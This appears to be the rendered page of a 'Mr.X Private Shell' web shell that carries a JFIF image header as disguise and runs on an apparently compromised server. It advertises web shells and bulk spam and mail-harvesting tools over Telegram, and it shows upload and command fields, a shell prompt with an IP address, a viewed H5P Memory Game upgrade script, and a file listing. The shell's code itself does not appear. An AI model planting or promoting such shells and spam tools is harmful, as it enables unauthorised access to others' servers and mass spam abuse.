����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
var H5PUpgrades = H5PUpgrades || {};

H5PUpgrades['H5P.MemoryGame'] = (function () {
  return {
    1: {
      /**
       * Asynchronous content upgrade hook.
       * Upgrades content parameters to support Memory Game 1.1.
       *
       * Move card images into card object as this allows for additonal
       * properties for each card.
       *
       * @params {object} parameters
       * @params {function} finished
       */
      1: function (parameters, finished) {
        for (var i = 0; i < parameters.cards.length; i++) {
          parameters.cards[i] = {
            image: parameters.cards[i]
          };
        }

        finished(null, parameters);
      },

      /**
       * Asynchronous content upgrade hook.
       * Upgrades content parameters to support Memory Game 1.2.
       *
       * Add default behavioural settings for the new options.
       *
       * @params {object} parameters
       * @params {function} finished
       */
      2: function (parameters, finished) {

        parameters.behaviour = {};
        parameters.behaviour.useGrid = false;
        parameters.behaviour.allowRetry = false;

        finished(null, parameters);
      }
    }
  };
})();

Filemanager

Name Type Size Permission Actions
7953ec1c0ba81228d097d9bf082a692a7eaccee2 File 1.17 KB 0666